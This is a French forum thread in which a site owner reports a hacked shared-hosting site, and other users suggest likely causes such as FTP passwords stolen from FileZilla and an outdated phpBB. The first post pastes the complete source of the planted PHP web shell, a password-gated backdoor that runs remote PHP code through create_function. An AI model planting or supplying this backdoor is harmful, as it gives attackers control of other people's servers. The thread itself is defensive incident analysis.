Mon site a été hacké, comment trouver la faille

[Pat AfterMoon]

Bonjour,

Ce soir me connectant à mon site web par FTP j'ai découvert un truc que je n'avais jamais vu. Un répertoire a été créé avec un fichier PHP dedans, cela ressemble a un hack capable d'exécuter un code PHP transmis à distance.

Le répertoire s'appelait "hammerda" et le fichier 5bfa44.php.

Le contenu du fichier était le suivant :

<? if ( md5($_POST["PARAM_HASH"]) == "d673f1f28d9cddf84ad8aeb58d430b8e" ){ ?>
<? if(get_magic_quotes_gpc() == 1){ ?>
<? $post = stripslashes($_POST["f"]) ?>
<? }else{ ?><? $post = $_POST["f"] ?>
<? } ?>
<? $test_func = create_function("", $post) ?>
<? $test_func() ?>
<? } ?>
<? die ?>

D'après ce que j'en comprends cela permet d'envoyer du code source PHP à distance et de l'exécuter directement. Il y a même un système de protection pour éviter que n'importe qui utilise le script (en tout cas c'est comme ça que je comprends le PARAM_HASH).

J'imagine que cela permet d'envoyer du spam depuis mon serveur ou d'attaquer mon site depuis l'intérieur.

Bien sur j'ai effacé tout ça, mais je me demande comment le hackeur a réussi a le mettre chez moi.

Pour info, j'ai un hébergement mutualisé, PHP, MySQL, plusieurs scripts maison et un forum phpBB.

Modifié 2 Septembre 2010 par Pat AfterMoon

[captain_torche]

Première chose à faire : modifier tes mots de passe BDD et FTP.

Ensuite, mets phpBB à jour, si ce n'est pas déjà fait.

[Bigb06]

Effectivement, ca fait peur!

Il y a pas mal de problèmes en ce moment avec des comptes Filezilla piratés, est ce que c'est votre cas?

[Pat AfterMoon]

Il y a pas mal de problèmes en ce moment avec des comptes Filezilla piratés

J'utilise Filezilla comme client FTP, mais quel est le rapport ? Quelle est cette histoire de "compte Filezilla piratés" ?

Je n'ai pas de "compte" FileZilla, par contre j'ai un compte FTP pour accéder à mon site web, et jusqu'à maintenant j'avais gardé le mot de passe attribué par défaut par OVH.

[Bigb06]

J'utilise Filezilla comme client FTP, mais quel est le rapport ? Quelle est cette histoire de "compte Filezilla piratés" ?

Je n'ai pas de "compte" FileZilla, par contre j'ai un compte FTP pour accéder à mon site web, et jusqu'à maintenant j'avais gardé le mot de passe attribué par défaut par OVH.

Parce que de nombreux "virus" s'attaquent aux comptes sauvegardés sur le PC.

[Jeanluc]

Bonjour,

Si tu demandes à FileZilla d'enregistrer des noms d'utilisateurs et des mots de passe FTP, il les enregistre en clair dans un fichier du PC. Si un agresseur peut accéder à ce fichier au moyen d'un logiciel espion, il obtient la liste des utilisateurs et mots de passe stockés par FileZilla dans ton PC.

Maintenant, il faut bien que FileZilla les stocke quelque part, à moins qu'on ne veuille les retaper à chaque connexion, mais alors on choisira probablement des mots de passe toujours les mêmes ou plus faciles à deviner.

En principe, avec un bon antivirus avec mises à jour automatiques, on évite de voir son PC contrôler par une personne malveillante.

Ici, c'est probablement impossible de trouver l'origine exacte de la faille. Je pense que captain_torche a bien résumé la situation. Il faut changer les mots de passe (je suppose que tu l'as fait entretemps) et utiliser les versions à jour des logiciels. Si cela ne suffit pas, il faudra tout réinstaller à partir d'originaux sains.

Jean-Luc

[Bigb06]

Bien sur Filezilla doit stocker les mots de passe, c'est logique. Ce que je veux dire c'est que sur PC Filezilla est aujourd'hui le client FTP le plus populaire et que des outils automatisés existent.

[paolodelmare]

Filezilla stocke les mdp en clair. Il suffit de visiter le forum de fz pour voir que le problème de vol de mdp est courant.

[Pat AfterMoon]

Merci pour vos réponses, mais vous m'avez rendu complètement parano

Ce qui m'embête c'est que je ne saurai jamais quelle est vraiment la faille sur ce coup. Ce qui m'inquiète le plus c'est mes scripts maison, car je ne maintiens plus trop ce site et que les risques de failles sont nombreux.

En tout cas à l'avenir si j'ai un nouveau site à faire je vais peux être revoir ma stratégie vis à vis de la formule Pro multi-domaine d'OVH. Parce sur ce coup la, avec un site hacké, c'est tous mes site qui sont exposés.

Par contre j'ai remplacé le script du hackeur par un script à moi qui stocke des infos en cas d'accès, et pour l'instant je n'ai eu aucun hit. Peut être que le script n'est utilisé qu'une seule fois juste après avoir été introduit. C'est dommage, j'aurais bien aimé voir l'adresse IP et le mot de passe

Mais s'ils avaient poussé le vice jusqu'à effacer le script, je ne me serais même pas rendu compte de quoi que ce soit.

[BonBackLink]

Vérifie également que ton register global soit à off.

A plus.